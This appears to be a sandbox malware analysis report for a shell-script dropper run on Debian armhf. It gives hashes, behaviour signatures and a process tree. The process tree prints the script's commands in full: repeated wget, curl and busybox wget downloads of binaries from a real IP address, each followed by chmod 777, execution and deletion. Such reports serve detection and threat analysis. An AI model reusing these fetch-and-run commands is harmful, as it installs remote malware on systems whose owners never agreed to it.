Analysis
-
max time kernel
28s -
max time network
29s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/11/2024, 04:11
Static task
static1
Behavioral task
behavioral1
Sample
34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh
-
Size
10KB
-
MD5
c37909f22e6c9757fe113ee40d48afe5
-
SHA1
eb767ecc9f0b5a38dad577537365d1c7d7940a88
-
SHA256
34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858
-
SHA512
355bfcd57d9a25ee4c1baace0bace4182e17c6cd5f723c5b8fa94666c6bcb0526868cdace553284d20d600ea9b6468511f9d26ee8f0f3fcd4d3ba8a99edf07d2
-
SSDEEP
192:m+ymFtr7pJ8KWTgPb27RRbA7frJ4ofBBzrPp71D1H1iiEBNa3ju7EMckiuR3jOEs:nQHjAfJxVihBNZAOWxVihBitB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 910 chmod 892 chmod 752 chmod 764 chmod 874 chmod 898 chmod 677 chmod 719 chmod 832 chmod 844 chmod 850 chmod 868 chmod 705 chmod 809 chmod 886 chmod 770 chmod 862 chmod 880 chmod 856 chmod 838 chmod 793 chmod 822 chmod 904 chmod 733 chmod 683 chmod 690 chmod 780 chmod 666 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ 667 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ /tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O 678 PRidtlDXU05jmgjuUObnLgOEzRMj94T04O /tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE 684 pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE /tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB 692 SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB /tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak 707 JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak /tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 720 QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 /tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT 734 aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT /tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC 754 pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC /tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F 765 nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F /tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl 771 slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl /tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW 781 xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW /tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB 794 L2NF59wHsucPEijfToQ067fYfwkMvTPXCB /tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG 810 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG /tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT 824 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT /tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB 833 L2NF59wHsucPEijfToQ067fYfwkMvTPXCB /tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG 839 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG /tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT 845 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT /tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW 851 xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW /tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ 857 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ /tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O 863 PRidtlDXU05jmgjuUObnLgOEzRMj94T04O /tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE 869 pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE /tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB 875 SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB /tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC 881 pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC /tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F 887 nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F /tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl 893 slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl /tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak 899 JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak /tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 905 QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 /tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT 911 aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 656 curl 663 busybox 667 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ 668 rm 854 curl 647 wget 853 wget 855 busybox 857 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ 858 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ curl File opened for modification /tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT curl File opened for modification /tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak curl File opened for modification /tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC curl File opened for modification /tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O curl File opened for modification /tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F curl File opened for modification /tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 curl File opened for modification /tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG curl File opened for modification /tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW curl File opened for modification /tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ curl File opened for modification /tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE curl File opened for modification /tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB curl File opened for modification /tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl curl File opened for modification /tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT curl File opened for modification /tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB curl File opened for modification /tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F curl File opened for modification /tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT curl File opened for modification /tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT curl File opened for modification /tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC curl File opened for modification /tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl curl File opened for modification /tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak curl File opened for modification /tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 curl File opened for modification /tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O curl File opened for modification /tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW curl File opened for modification /tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB curl File opened for modification /tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB curl File opened for modification /tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE curl File opened for modification /tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG curl
Processes
-
/tmp/34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh/tmp/34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh1⤵PID:637
-
/bin/rm/bin/rm bins.sh2⤵PID:640
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- System Network Configuration Discovery
PID:647
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:656
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- System Network Configuration Discovery
PID:663
-
-
/bin/chmodchmod 777 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- File and Directory Permissions Modification
PID:666
-
-
/tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ./9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:667
-
-
/bin/rmrm 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- System Network Configuration Discovery
PID:668
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵PID:670
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵PID:676
-
-
/bin/chmodchmod 777 PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O./PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵
- Executes dropped EXE
PID:678
-
-
/bin/rmrm PRidtlDXU05jmgjuUObnLgOEzRMj94T04O2⤵PID:679
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵PID:680
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵PID:682
-
-
/bin/chmodchmod 777 pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE./pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE2⤵PID:685
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:687
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵PID:688
-
-
/bin/chmodchmod 777 SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB./SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB2⤵PID:693
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵PID:694
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:699
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵PID:703
-
-
/bin/chmodchmod 777 JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak./JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵
- Executes dropped EXE
PID:707
-
-
/bin/rmrm JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak2⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵PID:716
-
-
/bin/chmodchmod 777 QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9./QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵
- Executes dropped EXE
PID:720
-
-
/bin/rmrm QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s92⤵PID:721
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵PID:722
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵PID:730
-
-
/bin/chmodchmod 777 aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT./aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵PID:747
-
-
/bin/chmodchmod 777 pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC./pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵PID:763
-
-
/bin/chmodchmod 777 nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F./nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵PID:769
-
-
/bin/chmodchmod 777 slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl./slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl2⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵PID:777
-
-
/bin/chmodchmod 777 xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW./xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵
- Executes dropped EXE
PID:781
-
-
/bin/rmrm xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵PID:782
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵PID:791
-
-
/bin/chmodchmod 777 L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB./L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵PID:806
-
-
/bin/chmodchmod 777 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG./8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵PID:819
-
-
/bin/chmodchmod 777 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT./9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵PID:831
-
-
/bin/chmodchmod 777 L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB./L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm L2NF59wHsucPEijfToQ067fYfwkMvTPXCB2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵PID:837
-
-
/bin/chmodchmod 777 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG./8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵PID:843
-
-
/bin/chmodchmod 777 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT./9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵PID:849
-
-
/bin/chmodchmod 777 xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW./xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ2⤵
- System Network Configuration Discovery
PID:853
-
-
